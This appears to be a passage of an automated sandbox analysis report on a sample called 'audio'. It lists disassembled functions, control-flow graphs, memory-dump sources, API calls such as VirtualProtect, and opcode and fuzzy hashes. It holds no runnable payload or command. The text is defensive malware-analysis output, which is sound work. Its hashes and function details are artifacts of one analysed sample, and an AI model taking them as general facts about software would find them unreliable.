                                                      • Opcode ID: a431089411dc158786f136a4fa154ac934355f44ed1ab37a3d08a4326dbef991
                                                      • Instruction ID: de0190b881c39ea8d3248a6ce0be633804e30e502ef3c04c1e56bc5c5d76d3f2
                                                      • Opcode Fuzzy Hash: a431089411dc158786f136a4fa154ac934355f44ed1ab37a3d08a4326dbef991
                                                      • Instruction Fuzzy Hash: 0A11F4B1D043099FDB10DFAAC884BAFFBF4AF48210F14842AE419A7250C7799945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02229548 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 8 2229548-22295b7 FindCloseChangeNotification 11 22295c0-22295e5 8->11 12 22295b9-22295bf 8->12 12->11
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE ref: 022295AA
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646374393.0000000002220000.00000040.00000800.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2220000_audio.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 76549ac9e05c620f250ff5a7d7d2712a1937dca981c1074069e228d0c7751e7d
                                                      • Instruction ID: 53c650ad966c3a6e1cd757972d276c155f4026e9c53cc6177413619513432f1b
                                                      • Opcode Fuzzy Hash: 76549ac9e05c620f250ff5a7d7d2712a1937dca981c1074069e228d0c7751e7d
                                                      • Instruction Fuzzy Hash: 33113A71D003498FDB10DFAAC8457DFFBF8AF88214F24841AD519A7240C779A944CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 020BD5C4 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 148 20bd5c4-20bd5d6 149 20bd66a-20bd671 148->149 150 20bd5dc 148->150 151 20bd5de-20bd5ea 149->151 150->151 153 20bd5f0-20bd612 151->153 154 20bd676-20bd67b 151->154 155 20bd680-20bd695 153->155 156 20bd614-20bd632 153->156 154->153 160 20bd64c-20bd654 155->160 159 20bd63a-20bd64a 156->159 159->160 161 20bd6a2 159->161 162 20bd697-20bd6a0 160->162 163 20bd656-20bd667 160->163 162->163
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646086953.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_20bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 88e09f5005c58ff2797858d6161bf66f206253fedfe6ab12c3e0bc79dc0622e8
                                                      • Instruction ID: 077f12786be90901930161b04d52cc39276f48e167cc52743708e0b357dc5867
                                                      • Opcode Fuzzy Hash: 88e09f5005c58ff2797858d6161bf66f206253fedfe6ab12c3e0bc79dc0622e8
                                                      • Instruction Fuzzy Hash: E721D3B1504344EFDB26DF20D9C0B6AFBA5FF88318F24C569E8490B246C336D456DAA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 020BD4D8 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 131 20bd4d8-20bd4ea 132 20bd57e-20bd585 131->132 133 20bd4f0 131->133 134 20bd4f2-20bd4fe 132->134 133->134 136 20bd58a-20bd58f 134->136 137 20bd504-20bd526 134->137 136->137 138 20bd528-20bd546 137->138 139 20bd594-20bd5a9 137->139 142 20bd54e-20bd55e 138->142 143 20bd560-20bd568 139->143 142->143 144 20bd5b6 142->144 145 20bd5ab-20bd5b4 143->145 146 20bd56a-20bd57b 143->146 145->146
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646086953.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_20bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 442970c59819dc0c2b369e52d0865887290d75d29890c7724bb35e71d294f114
                                                      • Instruction ID: 87f509c0585ae35c5e3bf5af9fef6b574c5e9cafaeca6e89aba113d8d6be3a41
                                                      • Opcode Fuzzy Hash: 442970c59819dc0c2b369e52d0865887290d75d29890c7724bb35e71d294f114
                                                      • Instruction Fuzzy Hash: B52137B1504300DFDB26DF10D9C0B6AFBA5FF88318F208169E8090B256C336D856DBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 020BD4D3 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 260 20bd4d3-20bd4ea 261 20bd57e-20bd585 260->261 262 20bd4f0 260->262 263 20bd4f2-20bd4fe 261->263 262->263 265 20bd58a-20bd58f 263->265 266 20bd504-20bd526 263->266 265->266 267 20bd528-20bd546 266->267 268 20bd594-20bd5a9 266->268 271 20bd54e-20bd55e 267->271 272 20bd560-20bd568 268->272 271->272 273 20bd5b6 271->273 274 20bd5ab-20bd5b4 272->274 275 20bd56a-20bd57b 272->275 274->275
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646086953.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_20bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: ee20f13ae439f932b8e653e8074830cbef8426a3566365dddd78ca8f4738404a
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: 6411AF76504340CFCB16CF10D5C4B56FFB1FB84318F2486A9D8090B656C33AD45ADBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 020BD5BF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 277 20bd5bf-20bd5d6 278 20bd66a-20bd671 277->278 279 20bd5dc 277->279 280 20bd5de-20bd5ea 278->280 279->280 282 20bd5f0-20bd612 280->282 283 20bd676-20bd67b 280->283 284 20bd680-20bd695 282->284 285 20bd614-20bd632 282->285 283->282 289 20bd64c-20bd654 284->289 288 20bd63a-20bd64a 285->288 288->289 290 20bd6a2 288->290 291 20bd697-20bd6a0 289->291 292 20bd656-20bd667 289->292 291->292
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646086953.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_20bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: d12245152d4b259423bd1362896d37a4069a5d78b5705fa647c7aa9d151f252f
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: 3F11AF76504280CFCB16CF10D5C4B56FFB1FB88314F24C6A9D8494B656C33AD45ADBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 020BD006 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 330 20bd006-20bd03d 333 20bd03f-20bd04a 330->333 334 20bd08d-20bd095 330->334 335 20bd04c-20bd05a 333->335 336 20bd082-20bd089 333->336 334->333 339 20bd060 335->339 336->335 340 20bd08b 336->340 341 20bd063-20bd06b 339->341 340->341 342 20bd07b-20bd080 341->342 343 20bd06d-20bd075 341->343 342->343
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646086953.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_20bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f59aa8b81272d92ac84ed09b8e6cbdc3bf3b697ea4c40612bb3b36a951d7ae65
                                                      • Instruction ID: ab932e743a8c203fa38fb2df442d65cd72d9cfd5120593ca956a4b30edbde001
                                                      • Opcode Fuzzy Hash: f59aa8b81272d92ac84ed09b8e6cbdc3bf3b697ea4c40612bb3b36a951d7ae65
                                                      • Instruction Fuzzy Hash: 5D01697140D3809FD7238B258C84792BFE8DF43224F0984CBE9888F1A3C2695C44DB72
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 020BD01D Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2646086953.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_20bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 23c782067e0bb56b4e053da0c0e9a2c2b33087554c7ef132f5ff703e11a1a67c
                                                      • Instruction ID: 8ebbf2cee9dbd981a0ab807d1950f29b834ed52e728f81abe6d253f52714dcb3
                                                      • Opcode Fuzzy Hash: 23c782067e0bb56b4e053da0c0e9a2c2b33087554c7ef132f5ff703e11a1a67c
                                                      • Instruction Fuzzy Hash: 1001D671418340AFE7724E25CD84BEBFBD8EF85664F18C41AED490F282C3799841DAB2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:12.3%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:14
                                                      Total number of Limit Nodes:0
                                                      execution_graph 1760 670c10 1761 670c19 1760->1761 1764 67266f 1760->1764 1767 6732bf 1760->1767 1770 6792c0 1764->1770 1769 6792c0 VirtualProtect 1767->1769 1768 6732d8 1769->1768 1772 6792d3 1770->1772 1774 679378 1772->1774 1775 6793c0 VirtualProtect 1774->1775 1777 67268e 1775->1777 1756 679548 1757 679588 FindCloseChangeNotification 1756->1757 1759 6795b9 1757->1759

                                                      Executed Functions

                                                      Function 00679378 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 679378-6793f9 VirtualProtect 3 679402-679427 0->3 4 6793fb-679401 0->4 4->3
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 006793EC
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1605092525.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_670000_audio.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 8c6639dd4475289db97a906f5cb3f19d513527ce2eb4cdcd708dec917998508f
                                                      • Instruction ID: c9901480336364e711936b1edf9f66936158ace2f6d131bc10c714f00be75470
                                                      • Opcode Fuzzy Hash: 8c6639dd4475289db97a906f5cb3f19d513527ce2eb4cdcd708dec917998508f
                                                      • Instruction Fuzzy Hash: 3511F4B19042099FDB10DFAAC884BDFFBF5EF48320F14842AE419A7250C7759941CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00679548 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 8 679548-6795b7 FindCloseChangeNotification 11 6795c0-6795e5 8->11 12 6795b9-6795bf 8->12 12->11
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE ref: 006795AA
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1605092525.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_670000_audio.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 4d2e5f22d879018bda3fd28f588c1030dbfe112a1a8578fd19b68d3f2432e372
                                                      • Instruction ID: fe738e70fbd57a112877490b45dc1988e52e9b67cf645e8ed9d787825592c00a
                                                      • Opcode Fuzzy Hash: 4d2e5f22d879018bda3fd28f588c1030dbfe112a1a8578fd19b68d3f2432e372
                                                      • Instruction Fuzzy Hash: 451128719003498FDB10DFAAC4457DFFBF5EB88314F14841AD419A7240C775A940CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0061D5C4 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 102 61d5c4-61d5d6 103 61d66a-61d671 102->103 104 61d5dc 102->104 105 61d5de-61d5ea 103->105 104->105 107 61d5f0-61d612 105->107 108 61d676-61d67b 105->108 109 61d680-61d695 107->109 110 61d614-61d632 107->110 108->107 114 61d64c-61d654 109->114 113 61d63a-61d64a 110->113 113->114 115 61d6a2 113->115 116 61d697-61d6a0 114->116 117 61d656-61d667 114->117 116->117
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1604915519.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_61d000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e39145db440642212d4d0ae6a96f943a5d4538fa0c0cbb662e429d525204b7ea
                                                      • Instruction ID: 6018c8773841202d28a42469a3cc2e631ae2433a6721a791ea06406237a53f86
                                                      • Opcode Fuzzy Hash: e39145db440642212d4d0ae6a96f943a5d4538fa0c0cbb662e429d525204b7ea
                                                      • Instruction Fuzzy Hash: 4021F5B1504244EFDB05DF10D9C0BA6BBA6FB98314F28C569E8490B356C336D896DBE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0061D4D8 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 85 61d4d8-61d4ea 86 61d4f0 85->86 87 61d57e-61d585 85->87 88 61d4f2-61d4fe 86->88 87->88 90 61d504-61d526 88->90 91 61d58a-61d58f 88->91 92 61d594-61d5a9 90->92 93 61d528-61d546 90->93 91->90 97 61d560-61d568 92->97 96 61d54e-61d55e 93->96 96->97 98 61d5b6 96->98 99 61d5ab-61d5b4 97->99 100 61d56a-61d57b 97->100 99->100
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1604915519.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_61d000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1aefb3a07b04dd7e6a5f2a673ed2c707274442e243fb84ae147fad250b37a3ef
                                                      • Instruction ID: 7eb4ecfe32371e5b5ac20aab679881189264d34d3e8b299e0785530c4bba8a28
                                                      • Opcode Fuzzy Hash: 1aefb3a07b04dd7e6a5f2a673ed2c707274442e243fb84ae147fad250b37a3ef
                                                      • Instruction Fuzzy Hash: 6C2106B1504240DFDB04DF14D9C0B96BBA7FB98318F288569E8090B256C336D896CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0061D4D3 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 214 61d4d3-61d4ea 215 61d4f0 214->215 216 61d57e-61d585 214->216 217 61d4f2-61d4fe 215->217 216->217 219 61d504-61d526 217->219 220 61d58a-61d58f 217->220 221 61d594-61d5a9 219->221 222 61d528-61d546 219->222 220->219 226 61d560-61d568 221->226 225 61d54e-61d55e 222->225 225->226 227 61d5b6 225->227 228 61d5ab-61d5b4 226->228 229 61d56a-61d57b 226->229 228->229
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1604915519.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_61d000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: fc9d34d1470bbe4260f9306395d7de3331dd83997f358012dbbf537f0f4c591a
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: 9A11B1B6504240DFCB15CF10D5C4B96BF72FB94318F28C6A9D8090B756C33AD89ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0061D5BF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 231 61d5bf-61d5d6 232 61d66a-61d671 231->232 233 61d5dc 231->233 234 61d5de-61d5ea 232->234 233->234 236 61d5f0-61d612 234->236 237 61d676-61d67b 234->237 238 61d680-61d695 236->238 239 61d614-61d632 236->239 237->236 243 61d64c-61d654 238->243 242 61d63a-61d64a 239->242 242->243 244 61d6a2 242->244 245 61d697-61d6a0 243->245 246 61d656-61d667 243->246 245->246
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1604915519.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_61d000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: c1997567a32ef75555be8ed20da3f93a145fbeff55df0d7168325db1de17f697
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: B711D376504280DFCB15CF10D5C4B96BF72FB94314F28C6A9D8490B756C33AD89ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0061D006 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 290 61d006-61d03d 291 61d08d-61d095 290->291 292 61d03f-61d04a 290->292 291->292 293 61d082-61d089 292->293 294 61d04c-61d05a 292->294 293->294 299 61d08b 293->299 296 61d060 294->296 298 61d063-61d06b 296->298 300 61d07b-61d080 298->300 301 61d06d-61d075 298->301 299->298 300->301
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1604915519.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_61d000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cac5c7d2896d7d99fd659eb771765cde0a26d5ff3a10db5d8927a13ccc051440
                                                      • Instruction ID: 824afb621cdcb3586412059ac85909dc677cd710f9886dd13a0baa3323ec3487
                                                      • Opcode Fuzzy Hash: cac5c7d2896d7d99fd659eb771765cde0a26d5ff3a10db5d8927a13ccc051440
                                                      • Instruction Fuzzy Hash: A4010C6140E3C09FD7128B258D94B92BFB4DF57225F1D81DBD9888F2A3C2699C49C772
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0061D01D Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 303 61d01d-61d03d 304 61d08d-61d095 303->304 305 61d03f-61d04a 303->305 304->305 306 61d082-61d089 305->306 307 61d04c-61d05a 305->307 306->307 312 61d08b 306->312 309 61d060 307->309 311 61d063-61d06b 309->311 313 61d07b-61d080 311->313 314 61d06d-61d075 311->314 312->311 313->314
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1604915519.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_61d000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 588194e5c5a2c10c5aeaf6f08bae447a8fbb5f36a2bd924677d169f5cc33d18a
                                                      • Instruction ID: 877591e178869c9f0e38f567e547e7d268a40815bd16d0e9799ffa3c1845ba17
                                                      • Opcode Fuzzy Hash: 588194e5c5a2c10c5aeaf6f08bae447a8fbb5f36a2bd924677d169f5cc33d18a
                                                      • Instruction Fuzzy Hash: F901DB71408340AFE7204E26CC84BE7BBD9DF45765F1CC459DD490B242C3799C82C6B2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:11.3%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:14
                                                      Total number of Limit Nodes:0
                                                      execution_graph 1848 2220c10 1849 2220c19 1848->1849 1852 22232bf 1848->1852 1855 222266f 1848->1855 1858 22292c0 1852->1858 1857 22292c0 VirtualProtect 1855->1857 1856 222268e 1857->1856 1860 22292d3 1858->1860 1862 2229378 1860->1862 1863 22293c0 VirtualProtect 1862->1863 1865 22232d8 1863->1865 1866 2229548 1867 2229588 FindCloseChangeNotification 1866->1867 1869 22295b9 1867->1869

                                                      Executed Functions

                                                      Function 02229378 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 2229378-22293f9 VirtualProtect 3 2229402-2229427 0->3 4 22293fb-2229401 0->4 4->3
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 022293EC
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703402209.0000000002220000.00000040.00000800.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2220000_audio.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 6801612928213573a5e5b779d3de71e97df8e8cea162d3bfc3c7110660f005b9
                                                      • Instruction ID: 2d2e254a1065e661bde40bf9a7aabe3c1e1e8863f60d58cd7f0b306ff1802847
                                                      • Opcode Fuzzy Hash: 6801612928213573a5e5b779d3de71e97df8e8cea162d3bfc3c7110660f005b9
                                                      • Instruction Fuzzy Hash: 0D11F4B19003499FDB20DFAAC884BAFFBF4AF48214F14842AE459A7250C7759945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02229548 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 8 2229548-22295b7 FindCloseChangeNotification 11 22295c0-22295e5 8->11 12 22295b9-22295bf 8->12 12->11
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE ref: 022295AA
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703402209.0000000002220000.00000040.00000800.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2220000_audio.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 37d7724f303025d1860a65eb9755dcfa8785418d64a5b7338a63b7f99ca57987
                                                      • Instruction ID: e9d3de6a858eacfdaaf52157bf9f15202d9b6ce039cb61b8b471005eb1f171fd
                                                      • Opcode Fuzzy Hash: 37d7724f303025d1860a65eb9755dcfa8785418d64a5b7338a63b7f99ca57987
                                                      • Instruction Fuzzy Hash: 2C113A719003498FDB20DFAAC4457DFFBF8AF88214F24841AD519A7640C779A945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 021BD4D8 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 100 21bd4d8-21bd4ea 101 21bd57e-21bd585 100->101 102 21bd4f0 100->102 103 21bd4f2-21bd4fe 101->103 102->103 104 21bd58a-21bd58f 103->104 105 21bd504-21bd526 103->105 104->105 107 21bd528-21bd546 105->107 108 21bd594-21bd5a9 105->108 111 21bd54e-21bd55e 107->111 112 21bd560-21bd568 108->112 111->112 113 21bd5b6 111->113 114 21bd5ab-21bd5b4 112->114 115 21bd56a-21bd57b 112->115 114->115
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703145952.00000000021BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_21bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e848552b18473cdd7374c366c5cdd3dd9574263232659900b07f3f2e2efebcac
                                                      • Instruction ID: 28d1e90e7c429578bbcc30e8bcc2c52e37d29b01261c38e00881a73807f2ea1a
                                                      • Opcode Fuzzy Hash: e848552b18473cdd7374c366c5cdd3dd9574263232659900b07f3f2e2efebcac
                                                      • Instruction Fuzzy Hash: BF2137B1544300DFDB0ADF10E9C0B66BBB5FF88318F208169E8090B256C336D856CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 021BD5C4 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 117 21bd5c4-21bd5d6 118 21bd66a-21bd671 117->118 119 21bd5dc 117->119 120 21bd5de-21bd5ea 118->120 119->120 121 21bd5f0-21bd612 120->121 122 21bd676-21bd67b 120->122 124 21bd680-21bd695 121->124 125 21bd614-21bd632 121->125 122->121 129 21bd64c-21bd654 124->129 128 21bd63a-21bd64a 125->128 128->129 130 21bd6a2 128->130 131 21bd697-21bd6a0 129->131 132 21bd656-21bd667 129->132 131->132
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703145952.00000000021BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_21bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b9b71c841e3d4d9a5c259b5629d487da2bfeda897cbb0f770905ca5172c88f2f
                                                      • Instruction ID: ce07053b0e66a15694d000fe602df851e95ca392785bce48c283f09bc705248b
                                                      • Opcode Fuzzy Hash: b9b71c841e3d4d9a5c259b5629d487da2bfeda897cbb0f770905ca5172c88f2f
                                                      • Instruction Fuzzy Hash: 3721D3B1544244EFDB0ADF20E9C0B66BBB5FF88314F24C569E8490B246C336D456CAE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 021BD5BF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 246 21bd5bf-21bd5d6 247 21bd66a-21bd671 246->247 248 21bd5dc 246->248 249 21bd5de-21bd5ea 247->249 248->249 250 21bd5f0-21bd612 249->250 251 21bd676-21bd67b 249->251 253 21bd680-21bd695 250->253 254 21bd614-21bd632 250->254 251->250 258 21bd64c-21bd654 253->258 257 21bd63a-21bd64a 254->257 257->258 259 21bd6a2 257->259 260 21bd697-21bd6a0 258->260 261 21bd656-21bd667 258->261 260->261
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703145952.00000000021BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_21bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
